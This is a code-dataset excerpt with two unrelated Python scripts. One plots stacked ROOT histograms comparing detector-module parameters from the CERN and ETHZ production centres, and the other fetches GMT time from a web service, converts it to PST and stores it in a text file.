stack = r.THStack('stack', parameters[par]['canvas'])
listdata =[[],[]]
for i in range(len(FilePath)):
File = r.TFile(FilePath[i])
cFile = File.Get(parameters[par]['canvas']+temperature)
List = cFile.GetListOfPrimitives()
histo = List[1]
histo.SetName(FilePath[i][8:11])
histo.SetLineColor(i+2)
histo.SetFillColor(i+2)
stack.Add(histo)
histo.SetStats(0)
listdata[i].append(histo.GetEntries())
listdata[i].append(histo.GetMean())
listdata[i].append(histo.GetRMS())
return stack, listdata
def main():
for temperature in temperatures:
for par in parameters.keys():
FilePath = GetFilePath(par, temperature)
stack, listdata = CreateStack(FilePath, par, temperature)
canvas = r.TCanvas(parameters[par]['canvas'], "", 1)
canvas.cd()
canvas.SetLogy()
max = stack.GetMaximum()
stack.SetMaximum(max*12)
stack.SetMinimum(0.5)
stack.Draw()
if par == 'Noise' or par == 'PHCalibrationParameter1':
stack.GetYaxis().SetTitle('# Pixels')
elif par == 'Current150V' or par == 'SlopeIV':
stack.GetYaxis().SetTitle('# Modules')
else:
stack.GetYaxis().SetTitle('# ROCs')
stack.GetXaxis().SetTitle(parameters[par]['xaxistitle'])
canvas.Update()
#r.gPad.Update()
#Ymax = r.gPad.GetUymax()
#gradB = r.TLine(parameters[par]['gradB'], 0, parameters[par]['gradB'], Ymax)
#gradC = r.TLine(parameters[par]['gradC'], 0, parameters[par]['gradC'], Ymax)
if par == 'PHCalibrationParameter1' or 'Noise':
gradB = r.TLine(parameters[par]['gradB'], 0, parameters[par]['gradB'], stack.GetMaximum()*3)
gradC = r.TLine(parameters[par]['gradC'], 0, parameters[par]['gradC'], stack.GetMaximum()*3)
else:
gradB = r.TLine(parameters[par]['gradB'], 0, parameters[par]['gradB'], stack.GetMaximum()*5)
gradC = r.TLine(parameters[par]['gradC'], 0, parameters[par]['gradC'], stack.GetMaximum()*5)
gradB.SetLineColor(r.kOrange)
if par == 'Noise' or par == 'PHCalibrationParameter1':
gradC.SetLineColor(r.kOrange)
else:
gradC.SetLineColor(r.kRed)
gradB.SetLineStyle(2)
gradC.SetLineStyle(2)
gradB.SetLineWidth(3)
gradC.SetLineWidth(3)
gradB.Draw()
gradC.Draw()
latex = r.TLatex()
latex.SetNDC()
latex.SetTextAlign(13)
latex.DrawLatex(0.3, 0.87, '#color[2]{N: '+'{:.0f}'.format(listdata[0][0])+' Mean: '+'{:.3f}'.format(listdata[0][1])+' RMS: '+'{:.3f}'.format(listdata[0][2])+'}')
latex.DrawLatex(0.3, 0.82, '#color[3]{N: '+'{:.0f}'.format(listdata[1][0])+' Mean: '+'{:.3f}'.format(listdata[1][1])+' RMS: '+'{:.3f}'.format(listdata[1][2])+'}')
Legend = r.TLegend(0.15,0.75,0.25,0.9)
Legend.AddEntry('CER', 'CERN', 'f')
#Legend.AddEntry('PER', 'PERUGIA', 'f')
#Legend.AddEntry('AAC', 'AACHEN', 'f')
Legend.AddEntry('ETH', 'ETHZ', 'f')
Legend.SetBorderSize(0)
Legend.SetFillStyle(0)
#Legend.AddEntry('gradB', 'Grade B threshold', 'l')
#Legend.AddEntry('gradC', 'Grade C threshold', 'l')
Legend.Draw()
for fmt in ['.png', '.pdf', '.root']:
canvas.SaveAs('Results/CompareModulesRespin/'+temperature+'ProdCentersStack'+parameters[par]['file']+str(fmt))
main()
|
23,499 | ae4e12d4264ff0aaf41a4afaf7512283312fe5b0 | import time
import os
import requests
# Reads the value stored in dataStorage.txt, if such a value exists
def readValue():
fr = open("dataStorage.txt", "r")
time = fr.read()
fr.close()
print(time)
return time
# Writes a given value to dataStorage.txt - if dataStorage.txt doesn't yet exist, the file is created then written to.
def storeValue(value):
fo = open("dataStorage.txt", "w")
fo.flush()
fo.write(str(value))
fo.close()
# Fetches the current GMT time from the internet
# Format: yyyy-mm-dd HH:mm:ss
def getCurrentGMTTime():
try:
res = requests.get('http://just-the-time.appspot.com/')
return res.content
except:
print('Could not sync with time server.')
print('Done.')
# Converts the fetched GMT time to PST
# Format: yyyy-mm-dd HH:mm:ss
def getCurrentPSTTime():
gmtTime = getCurrentGMTTime()
splitDateTime = str(gmtTime).split(' ')
splitTime = splitDateTime[1].split(":")
hours = int(splitTime[0])
hours -= 7
pst = splitDateTime[0] + " " + str(hours) + ":" + splitTime[1] + ":" + splitTime[2]
pst = pst[2:]
return pst
# Get the current PST time and write it to dataStorage.txt
pst = getCurrentPSTTime()
storeValue(pst)
readValue() |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.